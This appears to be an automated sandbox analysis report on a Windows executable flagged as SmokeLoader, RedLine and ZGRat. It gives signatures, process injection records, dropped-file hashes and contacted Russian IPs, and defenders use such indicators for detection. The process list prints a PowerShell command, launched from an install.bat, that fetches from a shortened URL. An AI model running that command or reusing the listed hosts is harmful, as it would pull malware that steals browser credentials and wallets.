Malware Analysis Report

2025-03-15 05:01

Sample ID 231218-1n8ccafcf3
Target b67151e07936533f3b38355566e47650.exe
SHA256 bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367
Tags
smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat 666 rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367

Threat Level: Known bad

The file b67151e07936533f3b38355566e47650.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat 666 rat spyware stealer

ZGRat

SmokeLoader

RedLine

Detect ZGRat V1

Smokeloader family

RedLine payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Deletes itself

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 21:48

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 21:48

Reported

2023-12-18 21:51

Platform

win7-20231215-en

Max time kernel

27s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7946.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1196 wrote to memory of 2804 N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2804 N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2804 N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2804 N/A N/A C:\Users\Admin\AppData\Local\Temp\626B.exe
PID 1196 wrote to memory of 2712 N/A N/A C:\Users\Admin\AppData\Local\Temp\7946.exe
PID 1196 wrote to memory of 2712 N/A N/A C:\Users\Admin\AppData\Local\Temp\7946.exe
PID 1196 wrote to memory of 2712 N/A N/A C:\Users\Admin\AppData\Local\Temp\7946.exe
PID 1196 wrote to memory of 2712 N/A N/A C:\Users\Admin\AppData\Local\Temp\7946.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

C:\Users\Admin\AppData\Local\Temp\626B.exe

C:\Users\Admin\AppData\Local\Temp\626B.exe

C:\Users\Admin\AppData\Local\Temp\7946.exe

C:\Users\Admin\AppData\Local\Temp\7946.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
RU 77.105.132.87:17066 tcp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:80 api.ipify.org tcp

Files

memory/1812-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1196-1-0x0000000002D80000-0x0000000002D96000-memory.dmp

memory/1812-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\626B.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/2804-14-0x00000000000E0000-0x0000000000132000-memory.dmp

memory/2804-19-0x0000000074C20000-0x000000007530E000-memory.dmp

memory/2804-20-0x0000000005060000-0x00000000050A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7946.exe

MD5 2a28b9b387ac57fc29a0457bf3db1362
SHA1 aab48e37c9ebf46044bb20166024391c2b4a460d
SHA256 12e8ef352e9fa063e140335978079015b61097b9079713ba016731a03cfd8265
SHA512 6aeef83b77a5ad3cf676a4156dadd4a8852dec0ced3d6d77d8273d073ef36884648c90e26c7b47ba8d90336956b7b4b1c8f8aa80c32440d6daf61266fa52b50a

C:\Users\Admin\AppData\Local\Temp\7946.exe

MD5 1e6201dd037dfef6161454cd3f86a3d3
SHA1 cbd0e2d34f16c16c481eb35c67c05ce86a37cf2a
SHA256 a9ba17c3daeac7e6a1436e1a8cdbc6c8025cd31101eb37c14366265f75dfbf97
SHA512 72a5144a0e44e97a88eccb04b3404a0326c5e9afd49ca047a734cd1822185c0328e2337751c5bb773f24de9e00213121b5fc21f750cf1628277e161c595b219a

memory/2712-28-0x0000000074C20000-0x000000007530E000-memory.dmp

memory/2712-29-0x0000000001090000-0x0000000001E82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 067c86cb45aeebf8bbbaae4c59001c95
SHA1 bc87b3d328c2d8de9f68f691162c0a33a6edeefa
SHA256 a10235f3f3a54383ce20a4be44e0ef3c68ac2667f7de867bcf893193a0fa9d8b
SHA512 3c92f7ab8ee34d1e268967314fb54c735d640f3a9cdabc551c26640eb83037bb1a341e58c2ce7151ad67b29ddb908a0b968ed20d164ac306b17f4dcbf58110cc

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 85127d5a4730180695b55de64e1ab99a
SHA1 c825af71b3e8a9ea67c6652045e98e56367ee3e4
SHA256 9a42c38b9fc5420639f8096f852bdbb163564beae220674d60f00a62e990c087
SHA512 f88bcb6d89c522e9d6c12b01a5e426943519b895632cca5a17085a01335759cbabc65c4871a6f0008a71999fed9a3598818ea3b8fac174f9b058717a3fdc122c

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 7b1763e38d5b7e23538811ff3d1cd671
SHA1 e27d43d575e624471f11854c5b15f3c6f7dd64b8
SHA256 21ab427f558875ea74978376bb928264c0311653da38ab337840646b522be1f1
SHA512 0c0dfa864ee8e303fba29ddfb124b1eb60f21ed8313e1ca6d3b876707713aeb2e3dec585a3d47a73dc3da70ad1a269ce6922be2db7a429d791e36df8e77033e0

\Users\Admin\AppData\Local\Temp\nsy7A4F.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 acf327299a2aad2e54ba6e45989487d4
SHA1 d0e1087c397c9af16320e879f0645964d9e25062
SHA256 73a74e97851389410284c7f828f7a565a8c0590174aad3fb952e8d6101a94d33
SHA512 0dd9a4566d7b04af861a777a2cf861e966b036e7a619747f19585e77e02286d2cf4c1013b4f560bed6e325e858ac5944f494fb51243be8d207a2d665eefe700a

memory/2788-64-0x00000000026A0000-0x0000000002A98000-memory.dmp

memory/2700-70-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 c112a959eabad02c143c62e260a3e7db
SHA1 73c14926ad2af8d845a6dd2714b23077484f4a53
SHA256 0dd421582cbe5f7a10df8f2b301cd9e46cdc4398b8d56152f64ac7e609db150c
SHA512 711359606ecea6f9549d33dbe0490c50c973f3301dcba3bcdac28ab4ca8506d887876d5f0612b1bc1342a34e32c05d1553504373bbc03eb7e375f979f2d99b49

memory/2712-71-0x0000000074C20000-0x000000007530E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 25eb9810ecb4b9f78a98460bd20dc79a
SHA1 777c39afebb2406a86168cf1ffd9b8fa9615f10f
SHA256 fdc4591f89adde93849d4342c79310e88395a80ac7cc6413c81544b4bfd5c386
SHA512 943b340c078eb0ed197490197512e4403e15a7d845917eff94ae3c08e9712c485ffff5da3e9c8da53aaad5e167b4d7f02a734b32eef6a70105e23c564407c933

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 ae13a10a632e150700966a92136cede5
SHA1 965320472f1277268babbe0289d57f5ac5f90ae1
SHA256 f8cb57d54fcf63c38d1c07b0370a37f61d0000081d85e71a1ef04eb474769a4a
SHA512 b7479368e3a657a8f2955a86653657ddb4fd99b13f04b0a0a05f3677d6c7cf3b7050821c25930460459acb7a811aeda3da221b45b0c0d65e69095e0bd6638992

\Users\Admin\AppData\Local\Temp\nsy7A4F.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 1564410c4dea562e8b73937a04f8820a
SHA1 979667abf02c267a65f9ee9344bd8d95b3df5d50
SHA256 9c793220c4db689907b222d6be4cbfb935883cf2a4f8695ef2b5a53d8aa464d1
SHA512 49eb1fdd6c13e5558ab701365d2a1d5fefcbb1ca55f9efad9245b04cd708514a324e0d785c0f1a9fac971783b417f5c9a08ef6d9758da7a3dd126e287547c242

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 bacc9bd9fb970d8ef3334b48eb786c7c
SHA1 029a0381e6fd71a55a8a0cc5c75827be978ede3f
SHA256 2dc25c88e27d0c704998ef4d5006e5b064b4b882b613a346f4753f603e9ef0a9
SHA512 7938927ee1667a6647472038fac7008da7509885f1ca2538bd6372fff78fffd738e1c3db31642a7b344148850b8bb1c180e959df1d28deac779dc3028d3024ca

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 182b623fb81bf7cab8127fd7ee0f75d1
SHA1 a0c0bc47b160a5ab85c38bdc6a46e367ba838c83
SHA256 e9d707c95e72d9a0213286b18c66cc9fe915f7d4819440398dab84499462e27e
SHA512 c1833ba75f33c3d0adb95b728d10e3752aac9790b278b146d8048414be751b126c428dbdce70f94c9f4899b8a5208c16340a87531124d1e06d84aa935bf0108a

memory/2788-83-0x00000000026A0000-0x0000000002A98000-memory.dmp

memory/2236-84-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2732-85-0x0000000000CB0000-0x0000000000DB0000-memory.dmp

memory/2732-87-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2236-88-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2788-90-0x0000000002AA0000-0x000000000338B000-memory.dmp

memory/2788-91-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2236-92-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2012-93-0x00000000001D0000-0x00000000001D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 aff4b824cee79c2a6e55cc23fa62b7cc
SHA1 9fc189c3dc19e12278288ac435236c2c2534960a
SHA256 a6906d2823fe84fe9852db9d6d9822e1a66ce7ad6e0c4c21f5ddbf3737875c5a
SHA512 f6afa76d950e6aa9250ae5ed068888efbf1b928e937f64cb84224e49c1d7bf0981503e40a4faa049e56ff828ea563637e2c0217fceb8bc59e23c7ba2584e7011

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 3f52c37d3eeee223c98484192fbc6700
SHA1 8492d3bc3b903497e237fcdd27c255782dd0767d
SHA256 a5e37010e39b8b1ada241866be51cef4b78b2cc45108c72faa7a564f58ca7d02
SHA512 49adb7dc7a5b798108ba6f36d6a9ed513ed9880338f801a2cda68a425d28f3df9df9eb22fe5db651e7c768b4571d6f7aaca00d46f3c2c986cf9bddee3e79cc82

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 12f835c3e1d78e0a86b1bb86a72e0d8c
SHA1 2964ca931f3b7ce8d10049ff67b08b86cfb90d85
SHA256 36509f0bc5c49702367ce0c4df90ba868ed60b11198eee96e4ecc4c911412907
SHA512 34a796add7f3fce8bde807f51a53a8421c35602fdfea9dca1d936e93bed742ad477d3697f8c559494724ec9bbf03014e4bdec62739b6fc10f3ca5ab0d257ee9b

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 21:48

Reported

2023-12-18 21:51

Platform

win10v2004-20231215-en

Max time kernel

46s

Max time network

85s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4F63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3092 set thread context of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3480 wrote to memory of 4472 N/A N/A C:\Users\Admin\AppData\Local\Temp\4F63.exe
PID 3480 wrote to memory of 4472 N/A N/A C:\Users\Admin\AppData\Local\Temp\4F63.exe
PID 3480 wrote to memory of 4472 N/A N/A C:\Users\Admin\AppData\Local\Temp\4F63.exe
PID 3480 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe
PID 3480 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe
PID 3480 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3092 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\67CE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe

"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"

C:\Users\Admin\AppData\Local\Temp\4F63.exe

C:\Users\Admin\AppData\Local\Temp\4F63.exe

C:\Users\Admin\AppData\Local\Temp\67CE.exe

C:\Users\Admin\AppData\Local\Temp\67CE.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\96EE.exe

C:\Users\Admin\AppData\Local\Temp\96EE.exe

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\A680.exe

C:\Users\Admin\AppData\Local\Temp\A680.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 204.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.25.253:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 253.25.5.3.in-addr.arpa udp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 125.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp

Files

memory/3632-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3480-1-0x0000000003150000-0x0000000003166000-memory.dmp

memory/3632-3-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4F63.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/4472-12-0x00000000005D0000-0x0000000000622000-memory.dmp

memory/4472-17-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4472-18-0x0000000005320000-0x00000000058C4000-memory.dmp

memory/4472-19-0x0000000004D70000-0x0000000004E02000-memory.dmp

memory/4472-20-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/4472-21-0x0000000004D50000-0x0000000004D5A000-memory.dmp

memory/4472-22-0x0000000006340000-0x0000000006958000-memory.dmp

memory/4472-24-0x0000000007BC0000-0x0000000007CCA000-memory.dmp

memory/4472-25-0x0000000006180000-0x0000000006192000-memory.dmp

memory/4472-26-0x0000000006260000-0x000000000629C000-memory.dmp

memory/4472-27-0x00000000062F0000-0x000000000633C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67CE.exe

MD5 964f43d4a3dd18ce2383d19b8fa97975
SHA1 0c431ade1a3cbcf5dd31c3d50c28ee6e90936cb8
SHA256 bf0eaeffee9226451e26c87fc151c6355a67bf0dabb04a243bddd58b00714cb3
SHA512 7a0a7d489908eace7cc22b4705308be59fef6d6a1b95e64d34bee1b4b8851867abc0ffd3b43db3a33e1733f581f712cd779db38503719ab3d0c03668ed0ddb1f

C:\Users\Admin\AppData\Local\Temp\67CE.exe

MD5 a4b215fde0622d66dd12611894145b3c
SHA1 605c61da3b923173c87cfb888b42166f15ea7351
SHA256 05d1cc6c1704647c15086e8cedb6e61c03b21a5a61ba645b4a69d24e2bc694aa
